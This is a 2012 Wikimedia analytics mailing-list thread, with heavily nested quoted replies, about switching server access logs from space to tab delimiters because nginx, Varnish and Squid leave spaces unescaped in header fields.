(Moving this to analytics list, cause uhhh, why not?)
Ok some more info!
I was testing some of my changes to udp-filter on my test labs instance, and hey! whadyaknow! The test failed. One of the failures was due to the content type field not matching correctly. It looked like this: text/html; charset=UTF-8 And actually, my test didn't catch the charset portion of this, my regexp is matching via whitespace. It was the semi-colon in the text/html string that caused the test to fail.
I started sleuthing, and determined that this only shows up in my logs if I am hitting mediawiki pages. I grepped mediawiki core, and found that there are tons of places that are manually setting the Content-Type header with the charset.
So I'm pretty sure the setting of the value of this header is coming directly from Mediawiki. But, that isn't really our issue. Headers are allowed to have spaces in the values.
Here's some example log output with spaces in headers. https://gist.github.com/2648312
Summary: Nginx: - Does not escape spaces in Content-Type - Does not escape spaces in Accept-Language - Does not escape spaces in any header (afaict*).
Varnish: - Does not escape space in Content-Type + Escapes spaces in Accept-Langage + Escapes spaces in any header (afaict).
Squid: ~ Removes charset from Content-Type header (?) + Escapes spaces in Accept-Language. + Escapes spaces in any header (afaict).
The remaining question we need to answer: Do we want to patch source code for these guys in order to fix this problem? I'd rather not if we don't have to. Do we have to? Uhhh, dunno!
-Ao
*As Far As I Can Tell
On May 9, 2012, at 11:42 AM, Erik Zachte wrote:
For scripts it makes no difference: split("\t") is fine
For browsing lines in an editor: I can disable tab expansion (or pipe to sed first)
For human readability of pasted log lines in e.g. mail, it's no big deal (just slightly more ambiguous than a printable char)
So, I'm fine which whatever works best, inter-process wise.
Downward compatibility is another issue, but subscribers to our logs could get tabs replaced by blanks before data are forwarded. Anyway please don't change this overnight.
--
*KISS*
Then again. Diederiks filter could easily and cheaply change all spaces to underscores, then all tabs to spaces, and no-one would even have to think twice, or make any changes.
Erik
From: Diederik van Liere [mailto:dvanliere@wikimedia.org] Sent: Wednesday, May 09, 2012 3:59 PM To: Andrew Otto Cc: Erik Zachte; Rob Lanphier Subject: Re: Using tab as delimiter instead of space in the log files
Even I thought 12 months ago, "how hard can it be to use spaces only as delimiters" in a server log line. And 12 months later I now *know* it is extremely hard and those spaces will keep coming back, and we will keep discarding those log lines because they do not match the expected number of fields. Right now, these space issues are giving me headaches to come up with reasonable WikipediaMobile app usage for the Mobile team.
But think a couple of months ahead when we want to stream our data into the cluster, do we really want a gazillion if else if statements to make sure that the data is in the right format before we store in the cluster? This will create a huge performance problem.
By keep fixing spaces we will always behind the facts, because it takes a while before we discover the issue, and then we need to make changes to the config and get it approved or we fix it for once and for all.
Because the user agent info is freeform I think it's safest to go with a tab control character but I am open for other suggestions.
Best, D
On Wed, May 9, 2012 at 9:40 AM, Andrew Otto otto@wikimedia.org wrote:
we have a lot of software scattered all over the place processing this stuff (much of which is outside the purview of this group), and we're probably going to break at least some of it with this change.
If so ja, could be a problem. How widespread is this? We'd like to keep track of these uses going forward.
Spaces, tabs and any non-URL character in a URL needs to be escaped by Varnish/nginx/Squid/whatever
the source can be located within hours and patched.
I really don't think we should start patching server software (like we did with nginx user agent string) to replace spaces.
Diederik, I agree. If we can figure out how to always escape things properly in the log format config directives for each log source (nginx,squid,varnishncsa), then no problem. But patching and recompiling every time we find a new edge case like this would be really annoying and kinda dangerous. The more changes we make to upstream sources the more we have to remember to maintain and the more bug prone we make crucial software.
Hmm, if we can figure out how to patch each of theses sources only once to make all whitespace characters in log fields escaped, then that might be ok. Mayyyybe, I dunno. What if we add a new source? Then we'd have to figure out how to patch it too.
is there any printable char that could be used?
Technically I'm sure we could find one, but I think we'd have more complaints about readability in emails and editors if we don't use whitespace than if we just used a tab.
What if we used multiple spaces (2? 4? 5?) as a delimiter? I'm not sure all the log format config directives would allow us to, but this might be less prone to editor weirdness, and also might cause problems for fewer users. Then they can split(' '). Although, hm, I guess that isn't much better than split("\t"), eh?
-A
On May 9, 2012, at 9:21 AM, Diederik van Liere wrote:
The tab would be inserted by varnish/squid/nginx when writing the log, we don't need to worry about URL transport or anything like that. We keep running into new cases where spaces show up where we don't expect them, and I really don't think we should start patching server software (like we did with nginx user agent string) to replace spaces. That locks us into specific versions of the software and the alternative is easy and robust.
Erik: I don't think that editor settings are a convincing argument against the use of tabs.
I am going to send this proposal to Wikitech mailing list.
D On 2012-05-09, at 7:29 AM, Erik Zachte wrote:
I'm not strongly pro or con but here are some thoughts:
I always get confused by tabs as they will be presented differently depending on editor settings (and different editors have different defaults). If someone pastes some log lines in an email, tabs might already have been expanded.
Also Diederik's new filter will validate the line, and count fields. If it signals invalid lines, the source can be located within hours and patched. How many sources could there be? We have 3 streams? In theory I am in favor of validating at the earliest point.
--
I know this is tricky, but if we decide to change, is there any printable char that could be used?
There are some characters that are out-of-bounds for urls, but some of those are unsafe for other reasons http://www.ietf.org/rfc/rfc1738.txt 2.2 section par. 'unsafe:'
<quote> Other characters are unsafe because gateways and other transport agents are known to sometimes modify such characters. These characters are "{", "}", "|", "\", "^", "~", "[", "]", and "`". <unquote>
One that comes to mind, but may have other quirks is 127/7F/
Another 2 cents. Erik
-----Original Message----- From: Diederik van Liere [mailto:dvanliere@wikimedia.org] Sent: Wednesday, May 09, 2012 3:33 AM To: Rob Lanphier Cc: Andrew Otto; Erik Zachte Subject: Re: Using tab as delimiter instead of space in the log files
a) Not sure why this wouldn't solve the problem, the problem is that we consistently are encountering spaces in fields while we are also using space as delimiter. By changing the delimiter we are no longer affected by spaces in the fields. Varnish does not need to escape tabs, those tabs are configured in the varnish/squid/nginx config files. Andrew, can you confirm this?
b) Who else is consuming the log files besides the analytics team and Erik Zachte? And changing to a tab as delimiter is going to be a small change, so yes it needs to be communicated to the people who consume these log files but not fixing it or alternative writing all kinds of patches seems a worse solution.
My 2 cents. D
On 2012-05-08, at 9:25 PM, Rob Lanphier wrote:
On Tue, May 8, 2012 at 6:06 PM, Diederik van Liere dvanliere@wikimedia.org wrote:
Instead of continuing patching our servers to fix these spaces issues I
strongly suggest that we move away from the space as delimiter and start using the tab (\t) character.
Eeek! I'm pretty sure that this will: a) not really solve the problem. If the Varnish isn't escaping spaces, what makes us think it's escaping tabs? Spaces, tabs and any non-URL character in a URL needs to be escaped by Varnish/nginx/Squid/whatever b) we have a lot of software scattered all over the place processing this stuff (much of which is outside the purview of this group), and we're probably going to break at least some of it with this change.
Regardless, we'll need to have a much wider conversation about such a change than this group.
Rob
Do we really need to write code? Don't all of these servers have a directive for setting a custom log format? (nginx: http://wiki.nginx.org/HttpLogModule#log_format)
Relatedly, did you happen to try testing other whitespace characters? I suspect some subset of tabs \t, vertical tabs \v, and/or the line break family \r\n\f get escaped consistently. (The stream modifiers \b\c\h\w are illegal.) If we were to figure that out, we could just switch to that character as the field delimiter and be done with it.
ps. It turns out it's legal to split header-values across newlines so long as the first character following the CRLF is a space or tab. So we might want to deal with that. Just sayin'. (It's called Linear White Space -- LWS.)
Some potentially useful HTTP RFC links: - LWS: http://www.w3.org/Protocols/rfc2616/rfc2616-sec2.html#sec2.2 - Modified BNF definition: http://www.w3.org/Protocols/rfc2616/rfc2616-sec2.html#sec2.2 - The Content-Type definition, which talks about "extended" attributes in values, separated by semi-colons: http://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html#sec3.7 - Header definitions: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14
pps. For what it's worth, the C source to nginx's HTTP header parser is available: - ngx_http_parse_header_line: http://mdounin.ru/hg/nginx-vendor-current/file/1e5c7a976f48/src/http/ngx_htt... - ngx_http_parse_multi_header_lines: http://mdounin.ru/hg/nginx-vendor-current/file/1e5c7a976f48/src/http/ngx_htt...
-- David Schoonover dsc@wikimedia.org
On May 9, 2012, at 1:40 PM, Andrew Otto wrote:
(Moving this to analytics list, cause uhhh, why not?)
Ok some more info!
I was testing some of my changes to udp-filter on my test labs instance, and hey! whadyaknow! The test failed. One of the failures was due to the content type field not matching correctly. It looked like this: text/html; charset=UTF-8 And actually, my test didn't catch the charset portion of this, my regexp is matching via whitespace. It was the semi-colon in the text/html string that caused the test to fail.
I started sleuthing, and determined that this only shows up in my logs if I am hitting mediawiki pages. I grepped mediawiki core, and found that there are tons of places that are manually setting the Content-Type header with the charset.
So I'm pretty sure the setting of the value of this header is coming directly from Mediawiki. But, that isn't really our issue. Headers are allowed to have spaces in the values.
Here's some example log output with spaces in headers. https://gist.github.com/2648312
Summary: Nginx:
- Does not escape spaces in Content-Type
- Does not escape spaces in Accept-Language
- Does not escape spaces in any header (afaict*).
Varnish:
- Does not escape space in Content-Type
- Escapes spaces in Accept-Langage
- Escapes spaces in any header (afaict).
Squid: ~ Removes charset from Content-Type header (?)
- Escapes spaces in Accept-Language.
- Escapes spaces in any header (afaict).
The remaining question we need to answer: Do we want to patch source code for these guys in order to fix this problem? I'd rather not if we don't have to. Do we have to? Uhhh, dunno!
-Ao
*As Far As I Can Tell
On May 9, 2012, at 11:42 AM, Erik Zachte wrote:
For scripts it makes no difference: split("\t") is fine
For browsing lines in an editor: I can disable tab expansion (or pipe to sed first)
For human readability of pasted log lines in e.g. mail, it's no big deal (just slightly more ambiguous than a printable char)
So, I'm fine which whatever works best, inter-process wise.
Downward compatibility is another issue, but subscribers to our logs could get tabs replaced by blanks before data are forwarded. Anyway please don't change this overnight.
--
*KISS*
Then again. Diederiks filter could easily and cheaply change all spaces to underscores, then all tabs to spaces, and no-one would even have to think twice, or make any changes.
Erik
From: Diederik van Liere [mailto:dvanliere@wikimedia.org] Sent: Wednesday, May 09, 2012 3:59 PM To: Andrew Otto Cc: Erik Zachte; Rob Lanphier Subject: Re: Using tab as delimiter instead of space in the log files
Even I thought 12 months ago, "how hard can it be to use spaces only as delimiters" in a server log line. And 12 months later I now *know* it is extremely hard and those spaces will keep coming back, and we will keep discarding those log lines because they do not match the expected number of fields. Right now, these space issues are giving me headaches to come up with reasonable WikipediaMobile app usage for the Mobile team.
But think a couple of months ahead when we want to stream our data into the cluster, do we really want a gazillion if else if statements to make sure that the data is in the right format before we store in the cluster? This will create a huge performance problem.
By keep fixing spaces we will always behind the facts, because it takes a while before we discover the issue, and then we need to make changes to the config and get it approved or we fix it for once and for all.
Because the user agent info is freeform I think it's safest to go with a tab control character but I am open for other suggestions.
Best, D
On Wed, May 9, 2012 at 9:40 AM, Andrew Otto otto@wikimedia.org wrote:
we have a lot of software scattered all over the place processing this stuff (much of which is outside the purview of this group), and we're probably going to break at least some of it with this change.
If so ja, could be a problem. How widespread is this? We'd like to keep track of these uses going forward.
Spaces, tabs and any non-URL character in a URL needs to be escaped by Varnish/nginx/Squid/whatever
the source can be located within hours and patched.
I really don't think we should start patching server software (like we did with nginx user agent string) to replace spaces.
Diederik, I agree. If we can figure out how to always escape things properly in the log format config directives for each log source (nginx,squid,varnishncsa), then no problem. But patching and recompiling every time we find a new edge case like this would be really annoying and kinda dangerous. The more changes we make to upstream sources the more we have to remember to maintain and the more bug prone we make crucial software.
Hmm, if we can figure out how to patch each of theses sources only once to make all whitespace characters in log fields escaped, then that might be ok. Mayyyybe, I dunno. What if we add a new source? Then we'd have to figure out how to patch it too.
is there any printable char that could be used?
Technically I'm sure we could find one, but I think we'd have more complaints about readability in emails and editors if we don't use whitespace than if we just used a tab.
What if we used multiple spaces (2? 4? 5?) as a delimiter? I'm not sure all the log format config directives would allow us to, but this might be less prone to editor weirdness, and also might cause problems for fewer users. Then they can split(' '). Although, hm, I guess that isn't much better than split("\t"), eh?
-A
On May 9, 2012, at 9:21 AM, Diederik van Liere wrote:
The tab would be inserted by varnish/squid/nginx when writing the log, we don't need to worry about URL transport or anything like that. We keep running into new cases where spaces show up where we don't expect them, and I really don't think we should start patching server software (like we did with nginx user agent string) to replace spaces. That locks us into specific versions of the software and the alternative is easy and robust.
Erik: I don't think that editor settings are a convincing argument against the use of tabs.
I am going to send this proposal to Wikitech mailing list.
D On 2012-05-09, at 7:29 AM, Erik Zachte wrote:
I'm not strongly pro or con but here are some thoughts:
I always get confused by tabs as they will be presented differently depending on editor settings (and different editors have different defaults). If someone pastes some log lines in an email, tabs might already have been expanded.
Also Diederik's new filter will validate the line, and count fields. If it signals invalid lines, the source can be located within hours and patched. How many sources could there be? We have 3 streams? In theory I am in favor of validating at the earliest point.
--
I know this is tricky, but if we decide to change, is there any printable char that could be used?
There are some characters that are out-of-bounds for urls, but some of those are unsafe for other reasons http://www.ietf.org/rfc/rfc1738.txt 2.2 section par. 'unsafe:'
<quote> Other characters are unsafe because gateways and other transport agents are known to sometimes modify such characters. These characters are "{", "}", "|", "\", "^", "~", "[", "]", and "`". <unquote>
One that comes to mind, but may have other quirks is 127/7F/
Another 2 cents. Erik
-----Original Message----- From: Diederik van Liere [mailto:dvanliere@wikimedia.org] Sent: Wednesday, May 09, 2012 3:33 AM To: Rob Lanphier Cc: Andrew Otto; Erik Zachte Subject: Re: Using tab as delimiter instead of space in the log files
a) Not sure why this wouldn't solve the problem, the problem is that we consistently are encountering spaces in fields while we are also using space as delimiter. By changing the delimiter we are no longer affected by spaces in the fields. Varnish does not need to escape tabs, those tabs are configured in the varnish/squid/nginx config files. Andrew, can you confirm this?
b) Who else is consuming the log files besides the analytics team and Erik Zachte? And changing to a tab as delimiter is going to be a small change, so yes it needs to be communicated to the people who consume these log files but not fixing it or alternative writing all kinds of patches seems a worse solution.
My 2 cents. D
On 2012-05-08, at 9:25 PM, Rob Lanphier wrote:
On Tue, May 8, 2012 at 6:06 PM, Diederik van Liere dvanliere@wikimedia.org wrote:
Instead of continuing patching our servers to fix these spaces issues I
strongly suggest that we move away from the space as delimiter and start using the tab (\t) character.
Eeek! I'm pretty sure that this will: a) not really solve the problem. If the Varnish isn't escaping spaces, what makes us think it's escaping tabs? Spaces, tabs and any non-URL character in a URL needs to be escaped by Varnish/nginx/Squid/whatever b) we have a lot of software scattered all over the place processing this stuff (much of which is outside the purview of this group), and we're probably going to break at least some of it with this change.
Regardless, we'll need to have a much wider conversation about such a change than this group.
Rob
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
Do we really need to write code? Don't all of these servers have a directive for setting a custom log format? (nginx: http://wiki.nginx.org/HttpLogModule#log_format)
Yeah, that's what we want to do. Robla is worried that changing the log format using tabs will break things for too many people. Gotta find out how many and who.
On May 9, 2012, at 6:23 PM, David Schoonover wrote:
Do we really need to write code? Don't all of these servers have a directive for setting a custom log format? (nginx: http://wiki.nginx.org/HttpLogModule#log_format)
Relatedly, did you happen to try testing other whitespace characters? I suspect some subset of tabs \t, vertical tabs \v, and/or the line break family \r\n\f get escaped consistently. (The stream modifiers \b\c\h\w are illegal.) If we were to figure that out, we could just switch to that character as the field delimiter and be done with it.
ps. It turns out it's legal to split header-values across newlines so long as the first character following the CRLF is a space or tab. So we might want to deal with that. Just sayin'. (It's called Linear White Space -- LWS.)
Some potentially useful HTTP RFC links:
- LWS: http://www.w3.org/Protocols/rfc2616/rfc2616-sec2.html#sec2.2
- Modified BNF definition: http://www.w3.org/Protocols/rfc2616/rfc2616-sec2.html#sec2.2
- The Content-Type definition, which talks about "extended" attributes in values, separated by semi-colons: http://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html#sec3.7
- Header definitions: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14
pps. For what it's worth, the C source to nginx's HTTP header parser is available:
- ngx_http_parse_header_line: http://mdounin.ru/hg/nginx-vendor-current/file/1e5c7a976f48/src/http/ngx_htt...
- ngx_http_parse_multi_header_lines: http://mdounin.ru/hg/nginx-vendor-current/file/1e5c7a976f48/src/http/ngx_htt...
-- David Schoonover dsc@wikimedia.org
On May 9, 2012, at 1:40 PM, Andrew Otto wrote:
(Moving this to analytics list, cause uhhh, why not?)
Ok some more info!
I was testing some of my changes to udp-filter on my test labs instance, and hey! whadyaknow! The test failed. One of the failures was due to the content type field not matching correctly. It looked like this: text/html; charset=UTF-8 And actually, my test didn't catch the charset portion of this, my regexp is matching via whitespace. It was the semi-colon in the text/html string that caused the test to fail.
I started sleuthing, and determined that this only shows up in my logs if I am hitting mediawiki pages. I grepped mediawiki core, and found that there are tons of places that are manually setting the Content-Type header with the charset.
So I'm pretty sure the setting of the value of this header is coming directly from Mediawiki. But, that isn't really our issue. Headers are allowed to have spaces in the values.
Here's some example log output with spaces in headers. https://gist.github.com/2648312
Summary: Nginx:
- Does not escape spaces in Content-Type
- Does not escape spaces in Accept-Language
- Does not escape spaces in any header (afaict*).
Varnish:
- Does not escape space in Content-Type
- Escapes spaces in Accept-Langage
- Escapes spaces in any header (afaict).
Squid: ~ Removes charset from Content-Type header (?)
- Escapes spaces in Accept-Language.
- Escapes spaces in any header (afaict).
The remaining question we need to answer: Do we want to patch source code for these guys in order to fix this problem? I'd rather not if we don't have to. Do we have to? Uhhh, dunno!
-Ao
*As Far As I Can Tell
On May 9, 2012, at 11:42 AM, Erik Zachte wrote:
For scripts it makes no difference: split("\t") is fine
For browsing lines in an editor: I can disable tab expansion (or pipe to sed first)
For human readability of pasted log lines in e.g. mail, it's no big deal (just slightly more ambiguous than a printable char)
So, I'm fine which whatever works best, inter-process wise.
Downward compatibility is another issue, but subscribers to our logs could get tabs replaced by blanks before data are forwarded. Anyway please don't change this overnight.
--
*KISS*
Then again. Diederiks filter could easily and cheaply change all spaces to underscores, then all tabs to spaces, and no-one would even have to think twice, or make any changes.
Erik
From: Diederik van Liere [mailto:dvanliere@wikimedia.org] Sent: Wednesday, May 09, 2012 3:59 PM To: Andrew Otto Cc: Erik Zachte; Rob Lanphier Subject: Re: Using tab as delimiter instead of space in the log files
Even I thought 12 months ago, "how hard can it be to use spaces only as delimiters" in a server log line. And 12 months later I now *know* it is extremely hard and those spaces will keep coming back, and we will keep discarding those log lines because they do not match the expected number of fields. Right now, these space issues are giving me headaches to come up with reasonable WikipediaMobile app usage for the Mobile team.
But think a couple of months ahead when we want to stream our data into the cluster, do we really want a gazillion if else if statements to make sure that the data is in the right format before we store in the cluster? This will create a huge performance problem.
By keep fixing spaces we will always behind the facts, because it takes a while before we discover the issue, and then we need to make changes to the config and get it approved or we fix it for once and for all.
Because the user agent info is freeform I think it's safest to go with a tab control character but I am open for other suggestions.
Best, D
On Wed, May 9, 2012 at 9:40 AM, Andrew Otto otto@wikimedia.org wrote:
we have a lot of software scattered all over the place processing this stuff (much of which is outside the purview of this group), and we're probably going to break at least some of it with this change.
If so ja, could be a problem. How widespread is this? We'd like to keep track of these uses going forward.
Spaces, tabs and any non-URL character in a URL needs to be escaped by Varnish/nginx/Squid/whatever
the source can be located within hours and patched.
I really don't think we should start patching server software (like we did with nginx user agent string) to replace spaces.
Diederik, I agree. If we can figure out how to always escape things properly in the log format config directives for each log source (nginx,squid,varnishncsa), then no problem. But patching and recompiling every time we find a new edge case like this would be really annoying and kinda dangerous. The more changes we make to upstream sources the more we have to remember to maintain and the more bug prone we make crucial software.
Hmm, if we can figure out how to patch each of theses sources only once to make all whitespace characters in log fields escaped, then that might be ok. Mayyyybe, I dunno. What if we add a new source? Then we'd have to figure out how to patch it too.
is there any printable char that could be used?
Technically I'm sure we could find one, but I think we'd have more complaints about readability in emails and editors if we don't use whitespace than if we just used a tab.
What if we used multiple spaces (2? 4? 5?) as a delimiter? I'm not sure all the log format config directives would allow us to, but this might be less prone to editor weirdness, and also might cause problems for fewer users. Then they can split(' '). Although, hm, I guess that isn't much better than split("\t"), eh?
-A
On May 9, 2012, at 9:21 AM, Diederik van Liere wrote:
The tab would be inserted by varnish/squid/nginx when writing the log, we don't need to worry about URL transport or anything like that. We keep running into new cases where spaces show up where we don't expect them, and I really don't think we should start patching server software (like we did with nginx user agent string) to replace spaces. That locks us into specific versions of the software and the alternative is easy and robust.
Erik: I don't think that editor settings are a convincing argument against the use of tabs.
I am going to send this proposal to Wikitech mailing list.
D On 2012-05-09, at 7:29 AM, Erik Zachte wrote:
I'm not strongly pro or con but here are some thoughts:
I always get confused by tabs as they will be presented differently depending on editor settings (and different editors have different defaults). If someone pastes some log lines in an email, tabs might already have been expanded.
Also Diederik's new filter will validate the line, and count fields. If it signals invalid lines, the source can be located within hours and patched. How many sources could there be? We have 3 streams? In theory I am in favor of validating at the earliest point.
--
I know this is tricky, but if we decide to change, is there any printable char that could be used?
There are some characters that are out-of-bounds for urls, but some of those are unsafe for other reasons http://www.ietf.org/rfc/rfc1738.txt 2.2 section par. 'unsafe:'
<quote> Other characters are unsafe because gateways and other transport agents are known to sometimes modify such characters. These characters are "{", "}", "|", "\", "^", "~", "[", "]", and "`". <unquote>
One that comes to mind, but may have other quirks is 127/7F/
Another 2 cents. Erik
-----Original Message----- From: Diederik van Liere [mailto:dvanliere@wikimedia.org] Sent: Wednesday, May 09, 2012 3:33 AM To: Rob Lanphier Cc: Andrew Otto; Erik Zachte Subject: Re: Using tab as delimiter instead of space in the log files
a) Not sure why this wouldn't solve the problem, the problem is that we consistently are encountering spaces in fields while we are also using space as delimiter. By changing the delimiter we are no longer affected by spaces in the fields. Varnish does not need to escape tabs, those tabs are configured in the varnish/squid/nginx config files. Andrew, can you confirm this?
b) Who else is consuming the log files besides the analytics team and Erik Zachte? And changing to a tab as delimiter is going to be a small change, so yes it needs to be communicated to the people who consume these log files but not fixing it or alternative writing all kinds of patches seems a worse solution.
My 2 cents. D
On 2012-05-08, at 9:25 PM, Rob Lanphier wrote:
On Tue, May 8, 2012 at 6:06 PM, Diederik van Liere dvanliere@wikimedia.org wrote: > Instead of continuing patching our servers to fix these spaces issues I
strongly suggest that we move away from the space as delimiter and start using the tab (\t) character.
Eeek! I'm pretty sure that this will: a) not really solve the problem. If the Varnish isn't escaping spaces, what makes us think it's escaping tabs? Spaces, tabs and any non-URL character in a URL needs to be escaped by Varnish/nginx/Squid/whatever b) we have a lot of software scattered all over the place processing this stuff (much of which is outside the purview of this group), and we're probably going to break at least some of it with this change.
Regardless, we'll need to have a much wider conversation about such a change than this group.
Rob
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
So far nobody has responded to my inquiry on whether they would be affected by this chance. So please let us know if you are consuming a server log and you are expecting spaces as delimiters. We want to make sure that we are aware of all the people that will be affected by this.
Best, Diederik
On Thu, May 10, 2012 at 9:51 AM, Andrew Otto otto@wikimedia.org wrote:
Do we really need to write code? Don't all of these servers have a
directive for setting a custom log format? (nginx: http://wiki.nginx.org/HttpLogModule#log_format) Yeah, that's what we want to do. Robla is worried that changing the log format using tabs will break things for too many people. Gotta find out how many and who.
On May 9, 2012, at 6:23 PM, David Schoonover wrote:
Do we really need to write code? Don't all of these servers have a
directive for setting a custom log format? (nginx: http://wiki.nginx.org/HttpLogModule#log_format)
Relatedly, did you happen to try testing other whitespace characters? I
suspect some subset of tabs \t, vertical tabs \v, and/or the line break family \r\n\f get escaped consistently. (The stream modifiers \b\c\h\w are illegal.) If we were to figure that out, we could just switch to that character as the field delimiter and be done with it.
ps. It turns out it's legal to split header-values across newlines so
long as the first character following the CRLF is a space or tab. So we might want to deal with that. Just sayin'. (It's called Linear White Space -- LWS.)
Some potentially useful HTTP RFC links:
- LWS: http://www.w3.org/Protocols/rfc2616/rfc2616-sec2.html#sec2.2
- Modified BNF definition:
http://www.w3.org/Protocols/rfc2616/rfc2616-sec2.html#sec2.2
- The Content-Type definition, which talks about "extended" attributes
in values, separated by semi-colons: http://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html#sec3.7
- Header definitions:
http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14
pps. For what it's worth, the C source to nginx's HTTP header parser is
available:
- ngx_http_parse_header_line:
http://mdounin.ru/hg/nginx-vendor-current/file/1e5c7a976f48/src/http/ngx_htt...
- ngx_http_parse_multi_header_lines:
http://mdounin.ru/hg/nginx-vendor-current/file/1e5c7a976f48/src/http/ngx_htt...
-- David Schoonover dsc@wikimedia.org
On May 9, 2012, at 1:40 PM, Andrew Otto wrote:
(Moving this to analytics list, cause uhhh, why not?)
Ok some more info!
I was testing some of my changes to udp-filter on my test labs
instance, and hey! whadyaknow! The test failed. One of the failures was due to the content type field not matching correctly. It looked like this:
text/html; charset=UTF-8 And actually, my test didn't catch the charset portion of this, my
regexp is matching via whitespace. It was the semi-colon in the text/html string that caused the test to fail.
I started sleuthing, and determined that this only shows up in my logs
if I am hitting mediawiki pages. I grepped mediawiki core, and found that there are tons of places that are manually setting the Content-Type header with the charset.
So I'm pretty sure the setting of the value of this header is coming
directly from Mediawiki. But, that isn't really our issue. Headers are allowed to have spaces in the values.
Here's some example log output with spaces in headers. https://gist.github.com/2648312
Summary: Nginx:
- Does not escape spaces in Content-Type
- Does not escape spaces in Accept-Language
- Does not escape spaces in any header (afaict*).
Varnish:
- Does not escape space in Content-Type
- Escapes spaces in Accept-Langage
- Escapes spaces in any header (afaict).
Squid: ~ Removes charset from Content-Type header (?)
- Escapes spaces in Accept-Language.
- Escapes spaces in any header (afaict).
The remaining question we need to answer: Do we want to patch source
code for these guys in order to fix this problem? I'd rather not if we don't have to. Do we have to? Uhhh, dunno!
-Ao
*As Far As I Can Tell
On May 9, 2012, at 11:42 AM, Erik Zachte wrote:
For scripts it makes no difference: split("\t") is fine
For browsing lines in an editor: I can disable tab expansion (or pipe
to sed first)
For human readability of pasted log lines in e.g. mail, it's no big
deal (just slightly more ambiguous than a printable char)
So, I'm fine which whatever works best, inter-process wise.
Downward compatibility is another issue, but subscribers to our logs
could get tabs replaced by blanks before data are forwarded.
Anyway please don't change this overnight.
--
*KISS*
Then again. Diederiks filter could easily and cheaply change all
spaces to underscores, then all tabs to spaces, and no-one would even have to think twice, or make any changes.
Erik
From: Diederik van Liere [mailto:dvanliere@wikimedia.org] Sent: Wednesday, May 09, 2012 3:59 PM To: Andrew Otto Cc: Erik Zachte; Rob Lanphier Subject: Re: Using tab as delimiter instead of space in the log files
Even I thought 12 months ago, "how hard can it be to use spaces only
as delimiters" in a server log line. And 12 months later I now *know* it is extremely hard and those spaces will keep coming back, and we will keep discarding those log lines because they do not match the expected number of fields. Right now, these space issues are giving me headaches to come up with reasonable WikipediaMobile app usage for the Mobile team.
But think a couple of months ahead when we want to stream our data
into the cluster, do we really want a gazillion if else if statements to make sure that the data is in the right format before we store in the cluster? This will create a huge performance problem.
By keep fixing spaces we will always behind the facts, because it
takes a while before we discover the issue, and then we need to make changes to the config and get it approved or we fix it for once and for all.
Because the user agent info is freeform I think it's safest to go with
a tab control character but I am open for other suggestions.
Best, D
On Wed, May 9, 2012 at 9:40 AM, Andrew Otto otto@wikimedia.org
wrote:
we have a lot of software scattered all over the place processing this stuff (much of which is outside the purview of this group), and we're probably going to break at least some of it with this change.
If so ja, could be a problem. How widespread is this? We'd like to
keep track of these uses going forward.
> Spaces, tabs and any > non-URL character in a URL needs to be escaped by > Varnish/nginx/Squid/whatever the source can be located within hours and patched.
I really don't think we should start patching server software (like
we did with nginx user agent string) to replace spaces.
Diederik, I agree. If we can figure out how to always escape things
properly in the log format config directives for each log source (nginx,squid,varnishncsa), then no problem. But patching and recompiling every time we find a new edge case like this would be really annoying and kinda dangerous. The more changes we make to upstream sources the more we have to remember to maintain and the more bug prone we make crucial software.
Hmm, if we can figure out how to patch each of theses sources only
once to make all whitespace characters in log fields escaped, then that might be ok. Mayyyybe, I dunno. What if we add a new source? Then we'd have to figure out how to patch it too.
is there any printable char that could be used?
Technically I'm sure we could find one, but I think we'd have more
complaints about readability in emails and editors if we don't use whitespace than if we just used a tab.
What if we used multiple spaces (2? 4? 5?) as a delimiter? I'm not
sure all the log format config directives would allow us to, but this might be less prone to editor weirdness, and also might cause problems for fewer users. Then they can split(' '). Although, hm, I guess that isn't much better than split("\t"), eh?
-A
On May 9, 2012, at 9:21 AM, Diederik van Liere wrote:
The tab would be inserted by varnish/squid/nginx when writing the
log, we don't need to worry about URL transport or anything like that.
We keep running into new cases where spaces show up where we don't
expect them, and I really don't think we should start patching server software (like we did with nginx user agent string) to replace spaces.
That locks us into specific versions of the software and the
alternative is easy and robust.
Erik: I don't think that editor settings are a convincing argument
against the use of tabs.
I am going to send this proposal to Wikitech mailing list.
D On 2012-05-09, at 7:29 AM, Erik Zachte wrote:
I'm not strongly pro or con but here are some thoughts:
I always get confused by tabs as they will be presented differently depending on editor settings (and different editors have different defaults). If someone pastes some log lines in an email, tabs might already
have been
expanded.
Also Diederik's new filter will validate the line, and count fields. If it signals invalid lines, the source can be located within hours
and
patched. How many sources could there be? We have 3 streams? In theory I am in favor of validating at the earliest point.
--
I know this is tricky, but if we decide to change, is there any
printable
char that could be used?
There are some characters that are out-of-bounds for urls, but some
of those
are unsafe for other reasons http://www.ietf.org/rfc/rfc1738.txt 2.2 section par. 'unsafe:'
<quote> Other characters are unsafe because gateways and other transport
agents are
known to sometimes modify such characters. These characters are "{", "}", "|", "", "^", "~", "[", "]", and
"`".
<unquote>
One that comes to mind, but may have other quirks is 127/7F/
Another 2 cents. Erik
-----Original Message----- From: Diederik van Liere [mailto:dvanliere@wikimedia.org] Sent: Wednesday, May 09, 2012 3:33 AM To: Rob Lanphier Cc: Andrew Otto; Erik Zachte Subject: Re: Using tab as delimiter instead of space in the log files
a) Not sure why this wouldn't solve the problem, the problem is that
we
consistently are encountering spaces in fields while we are also
using space
as delimiter. By changing the delimiter we are no longer affected by
spaces
in the fields. Varnish does not need to escape tabs, those tabs are configured in the varnish/squid/nginx config files. Andrew, can you
confirm
this?
b) Who else is consuming the log files besides the analytics team
and Erik
Zachte? And changing to a tab as delimiter is going to be a small
change, so
yes it needs to be communicated to the people who consume these log
files
but not fixing it or alternative writing all kinds of patches seems
a worse
solution.
My 2 cents. D
On 2012-05-08, at 9:25 PM, Rob Lanphier wrote:
> On Tue, May 8, 2012 at 6:06 PM, Diederik van Liere > dvanliere@wikimedia.org wrote: >> Instead of continuing patching our servers to fix these spaces
issues I
